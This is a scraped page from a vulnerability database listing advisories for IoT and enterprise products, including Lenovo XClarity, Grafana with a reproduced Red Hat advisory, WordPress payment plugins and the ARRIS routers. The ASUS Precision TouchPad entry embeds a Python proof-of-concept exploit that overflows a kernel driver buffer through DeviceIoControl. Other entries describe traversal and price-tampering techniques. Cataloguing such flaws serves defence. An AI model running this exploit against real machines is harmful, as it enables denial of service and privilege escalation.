VARIoT IoT vulnerabilities database

An XML External Entity (XXE) processing vulnerability was reported in Lenovo XClarity Administrator (LXCA) prior to version 2.5.0 , Lenovo XClarity Integrator (LXCI) for Microsoft System Center prior to version 7.7.0, and Lenovo XClarity Integrator (LXCI) for VMWare vCenter prior to version 6.1.0 that could allow information disclosure. Security vulnerabilities exist in Lenovo XClarity Administrator (LXCA), Lenovo XClarity Integrator (LXCI) for Microsoft System Center, and Lenovo XClarity Integrator (LXCI) for VMWare vCenter. An attacker could exploit this vulnerability to disclose information

A reflected cross-site scripting (XSS) vulnerability was reported in Lenovo XClarity Administrator (LXCA) versions prior to 2.5.0 that could allow a crafted URL, if visited, to cause JavaScript code to be executed in the user's web browser. The JavaScript code is not executed on LXCA itself. Lenovo XClarity Administrator (LXCA) Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Lenovo XClarity Administrator (LXCA) is a set of centralized resource management solutions of China Lenovo (Lenovo). The product provides agentless hardware management capabilities for servers, storage, network switches, and more. There is a cross-site scripting vulnerability in versions earlier than Lenovo LXCA 2.5.0

Sangfor Technology Co., Ltd. is a provider of products, services and solutions focusing on enterprise-level security, cloud computing and infrastructure. Sangfor VPN equipment has a command execution vulnerability, which can be exploited by attackers to gain server permissions.

Sangfor Technology Co., Ltd. is a provider of products, services and solutions focusing on enterprise-level security, cloud computing and infrastructure. Sangfor VPN equipment has a command execution vulnerability, which can be exploited by attackers to gain server permissions.

Xiaomi Bracelet 4NFC is a smart bracelet produced by Xiaomi Technology Co., Ltd. Xiaomi Mi Band 4NFC has a logic flaw vulnerability. Attackers can use this vulnerability to obtain sensitive information.

IBM Intelligent Operations Center V5.1.0 - V5.2.0, IBM Intelligent Operations Center for Emergency Management V5.1.0 - V5.1.0.6, and IBM Water Operations for Waternamics V5.1.0 - V5.2.1.1 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 161201. Vendors have confirmed this vulnerability IBM X-Force ID: 161201 It is released as.Information may be obtained. The product has functions such as data visualization and real-time collaboration. IBM Water Operations for Waternamics is a predictive analytics platform for water operators. The platform includes functions such as infrastructure management, asset management, and operation management for water operators. The vulnerability stems from the failure of the program to require users to use strong passwords by default. Attackers can use this vulnerability to control accounts

Directory traversal vulnerability on ONKYO TX-NR686 1030-5000-1040-0010 A/V Receiver devices allows remote attackers to read arbitrary files via a .. (dot dot) and %2f to the default URI. ONKYO TX-NR686 A/V Receiver The device contains a path traversal vulnerability.Information may be obtained. ONKYO TX-NR686 1030-5000-1040-0010 A/V Receiver is a home theater equipment produced by ONKYO, Japan. The vulnerability stems from a network system or product that fails to properly filter resources or special elements in file paths. An attacker could exploit this vulnerability to access locations outside of restricted directories

Directory Traversal in APIkit, HTTP connector, and OAuth2 Provider components in MuleSoft Mule Runtime 3.2.0 and higher released before August 1 2019, MuleSoft Mule Runtime 4.1.0 and higher released before August 1 2019, and all versions of MuleSoft API Gateway released before August 1 2019 allow remote attackers to read files accessible to the Mule process. MuleSoft Mule Runtime and MuleSoft API Gateway Contains a path traversal vulnerability.Information may be obtained. Path traversal vulnerabilities exist in Mulesoft API Gateway (all versions), APIkit, http-connector and OAuth2 Provider modules in Mulesoft 3.x and 4.x versions. The vulnerability stems from a network system or product that fails to properly filter resources or special elements in file paths. An attacker could exploit this vulnerability to access locations outside of restricted directories

The login-or-logout-menu-item plugin before 1.2.0 for WordPress has no requirement for lolmi_save_settings authentication. WordPress for login-or-logout-menu-item The plug-in contains an open redirect vulnerability.Information may be obtained and information may be altered. WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. login-or-logout-menu-item is a plugin for login / logout function of website users. An attacker could use this vulnerability to modify the login URL without authorization and redirect the user to a malicious website to steal user credentials

In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. Grafana Contains an access control vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Grafana is a set of open source monitoring tools that provide a visual monitoring interface at Grafana Labs. This tool is mainly used to monitor and analyze Graphite, InfluxDB and Prometheus. An access control error vulnerability exists in Grafana that could be exploited by an attacker to cause a denial of service. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: grafana security, bug fix, and enhancement update Advisory ID: RHSA-2020:1659-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:1659 Issue date: 2020-04-28 CVE Names: CVE-2019-15043 ==================================================================== 1. Summary: An update for grafana is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64 3. Description: Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. The following packages have been upgraded to a later upstream version: grafana (6.3.6). (BZ#1725278) Security Fix(es): * grafana: incorrect access control in snapshot HTTP API leads to denial of service (CVE-2019-15043) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.2 Release Notes linked from the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Package List: Red Hat Enterprise Linux AppStream (v. 8): Source: grafana-6.3.6-1.el8.src.rpm aarch64: grafana-6.3.6-1.el8.aarch64.rpm grafana-azure-monitor-6.3.6-1.el8.aarch64.rpm grafana-cloudwatch-6.3.6-1.el8.aarch64.rpm grafana-debuginfo-6.3.6-1.el8.aarch64.rpm grafana-elasticsearch-6.3.6-1.el8.aarch64.rpm grafana-graphite-6.3.6-1.el8.aarch64.rpm grafana-influxdb-6.3.6-1.el8.aarch64.rpm grafana-loki-6.3.6-1.el8.aarch64.rpm grafana-mssql-6.3.6-1.el8.aarch64.rpm grafana-mysql-6.3.6-1.el8.aarch64.rpm grafana-opentsdb-6.3.6-1.el8.aarch64.rpm grafana-postgres-6.3.6-1.el8.aarch64.rpm grafana-prometheus-6.3.6-1.el8.aarch64.rpm grafana-stackdriver-6.3.6-1.el8.aarch64.rpm ppc64le: grafana-6.3.6-1.el8.ppc64le.rpm grafana-azure-monitor-6.3.6-1.el8.ppc64le.rpm grafana-cloudwatch-6.3.6-1.el8.ppc64le.rpm grafana-debuginfo-6.3.6-1.el8.ppc64le.rpm grafana-elasticsearch-6.3.6-1.el8.ppc64le.rpm grafana-graphite-6.3.6-1.el8.ppc64le.rpm grafana-influxdb-6.3.6-1.el8.ppc64le.rpm grafana-loki-6.3.6-1.el8.ppc64le.rpm grafana-mssql-6.3.6-1.el8.ppc64le.rpm grafana-mysql-6.3.6-1.el8.ppc64le.rpm grafana-opentsdb-6.3.6-1.el8.ppc64le.rpm grafana-postgres-6.3.6-1.el8.ppc64le.rpm grafana-prometheus-6.3.6-1.el8.ppc64le.rpm grafana-stackdriver-6.3.6-1.el8.ppc64le.rpm s390x: grafana-6.3.6-1.el8.s390x.rpm grafana-azure-monitor-6.3.6-1.el8.s390x.rpm grafana-cloudwatch-6.3.6-1.el8.s390x.rpm grafana-debuginfo-6.3.6-1.el8.s390x.rpm grafana-elasticsearch-6.3.6-1.el8.s390x.rpm grafana-graphite-6.3.6-1.el8.s390x.rpm grafana-influxdb-6.3.6-1.el8.s390x.rpm grafana-loki-6.3.6-1.el8.s390x.rpm grafana-mssql-6.3.6-1.el8.s390x.rpm grafana-mysql-6.3.6-1.el8.s390x.rpm grafana-opentsdb-6.3.6-1.el8.s390x.rpm grafana-postgres-6.3.6-1.el8.s390x.rpm grafana-prometheus-6.3.6-1.el8.s390x.rpm grafana-stackdriver-6.3.6-1.el8.s390x.rpm x86_64: grafana-6.3.6-1.el8.x86_64.rpm grafana-azure-monitor-6.3.6-1.el8.x86_64.rpm grafana-cloudwatch-6.3.6-1.el8.x86_64.rpm grafana-debuginfo-6.3.6-1.el8.x86_64.rpm grafana-elasticsearch-6.3.6-1.el8.x86_64.rpm grafana-graphite-6.3.6-1.el8.x86_64.rpm grafana-influxdb-6.3.6-1.el8.x86_64.rpm grafana-loki-6.3.6-1.el8.x86_64.rpm grafana-mssql-6.3.6-1.el8.x86_64.rpm grafana-mysql-6.3.6-1.el8.x86_64.rpm grafana-opentsdb-6.3.6-1.el8.x86_64.rpm grafana-postgres-6.3.6-1.el8.x86_64.rpm grafana-prometheus-6.3.6-1.el8.x86_64.rpm grafana-stackdriver-6.3.6-1.el8.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2019-15043 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.2_release_notes/index 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBXqhVtdzjgjWX9erEAQjjzQ//UMQ+3TmzrSdgb9VpHE0EhP2PMJi7A9oo aieBhGN/4wPHmCoH2XHNSQPLkrmJf49ZkIPYzPcoZjs/DQ/oy7J/dT/nVNsW9Aul /JSVeWjlgNqFn4gZFe5LCtgqzt48FL/hSt1NgPqmpZWmyx1JXThTOed3PcbptmLO FgIj3Lhs7kcZk/LTvXNC4L3UyhUn5PJK+mXzAtNWTvW0Ca2cWGRVCtbssI/m87IL AR84wXaVj8xW054DLlojDfigUFXTlJr4PFM6tfFJwxUzgev8Xb6Sg09PM48FEd2L B7f1W9xb/27cqj0BDapp3vj8+ViKDOIDGeDZxlxdFMkQaK1mHNWOuNiIZCiGBDVd ++OX/wjjxbnfUiRd/ounQLZadta4D9c6qs+xORwHaPVy6hAOeV9UELDY+nmXo3tO GDGPAmLyJqdYZR/4PO1O0Gp7/dOyL+51J57QpD/7coGrwAikkm9hF2bI1WabRe01 nx/DEFdjOtmHXPR7g41BroCr81bom+J7SCru9MotBCVUm5HbW42mhPxixkb70Tlu +yUfSLZFO5Ve8VTF+/eMx817pwLQP/a6lkbJzVwwCYMIsgaaEgKXPj5BLM5P7hKk HyvYc7bWku+csEfM2Cf0qHFIYYxgBqZIp14UU70MZ0J6HQIMWCHXJqngUAzkvqR4 k/AjDHhUTII=yev2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

AsusPTPFilter.sys on Asus Precision TouchPad 11.0.0.25 hardware has a Pool Overflow associated with the \\.\AsusTP device, leading to a DoS or potentially privilege escalation via a crafted DeviceIoControl call. Asus Precision TouchPad Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS Asus Precision TouchPad is a touchpad driver from Taiwan ASUS Corporation. A security vulnerability exists in ASUS Asus Precision TouchPad version 11.0.0.25. An attacker could exploit this vulnerability to cause a denial of service and escalate privileges. #!/usr/bin/python # Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc # Date: 29-08-2019 # Exploit Author: Athanasios Tserpelis of Telspace Systems # Vendor Homepage: https://www.asus.com # Version: 11.0.0.25 # Software Link : https://www.asus.com # Contact: services[@]telspace.co.za # Twitter: @telspacesystems (Greets to the Telspace Crew) # Tested on: Windows 10 RS5 x64 # CVE: CVE-2019-10709 from ctypes import * kernel32 = windll.kernel32 ntdll = windll.ntdll NULL = 0 hevDevice = kernel32.CreateFileA("\\\\.\\AsusTP", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print "*** Couldn't get Device Driver handle." sys.exit(0) buf = "A"*12048 raw_input("Press Enter to Trigger Vuln") kernel32.DeviceIoControl(hevDevice, 0x221408, buf, 0x1, buf, 0x1 , 0, NULL)

In Philips HDI 4000 Ultrasound Systems, all versions running on old, unsupported operating systems such as Windows 2000, the HDI 4000 Ultrasound System is built on an old operating system that is no longer supported. Thus, any unmitigated vulnerability in the old operating system could be exploited to affect this product

cgi-bin/webscr?cmd=_cart in the WooCommerce PayPal Checkout Payment Gateway plugin 1.6.17 for WordPress allows Parameter Tampering in an amount parameter (such as amount_1), as demonstrated by purchasing an item for lower than the intended price. NOTE: The plugin author states it is true that the amount can be manipulated in the PayPal payment flow. However, the amount is validated against the WooCommerce order total before completing the order, and if it doesn’t match then the order will be left in an “On Hold” state. WordPress is a blogging platform developed by the WordPress Foundation using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. The vulnerability stems from the failure of the network system or product to properly validate the input data

/payu/icpcheckout/ in the WooCommerce PayU India Payment Gateway plugin 2.1.1 for WordPress allows Parameter Tampering in the purchaseQuantity=1 parameter, as demonstrated by purchasing an item for lower than the intended price. WordPress is a blogging platform developed by the WordPress Foundation using PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. An attacker can exploit this vulnerability to tamper with the 'purchaseQuantity' parameter to change the product price

CommScope ARRIS TR4400 devices with firmware through A1.00.004-180301 are vulnerable to an authentication bypass to the administrative interface because they include the current base64 encoded password within http://192.168.1.1/basic_sett.html. Any user connected to the Wi-Fi can exploit this. ARRIS TR4400 device Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. CommScope ARRIS TR4400 is a wireless router made by CommScope. An attacker could exploit this vulnerability to gain access to the management interface

CommScope ARRIS TR4400 devices with firmware through A1.00.004-180301 are vulnerable to an authentication bypass to the administrative interface because they include the current base64 encoded password within http://192.168.1.1/login.html. Any user connected to the Wi-Fi can exploit this. ARRIS TR4400 The device firmware contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The CommScope ARRIS TR4400 is a wireless router from CommScope. An attacker could exploit the vulnerability to access the management interface

The Eques elf smart plug and the mobile app use a hardcoded AES 256 bit key to encrypt the commands and responses between the device and the app. The communication happens over UDP port 27431. An attacker on the local network can use the same key to encrypt and send commands to discover all smart plugs in a network, take over control of a device, and perform actions such as turning it on and off. There is a security hole in the Eques Technology elf smart plug

Qinghan Technology QH-S302 terminal display device is the terminal part of the information release system. Qinghan Technology's QH-S302 terminal display device has an unauthorized access vulnerability. Attackers can use this leak to obtain sensitive information.

Xu Ji Group Co., Ltd. is a high-tech modern industry group focusing on power, automation and intelligent manufacturing. WPZD-163 (II) There is a logic flaw in the integrated measurement and control terminal of the distribution network. Attackers can use this vulnerability to download system files.

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. WordPress for WooCommerce Instamojo Payment Gateway The plug-in contains an input validation vulnerability.Information may be tampered with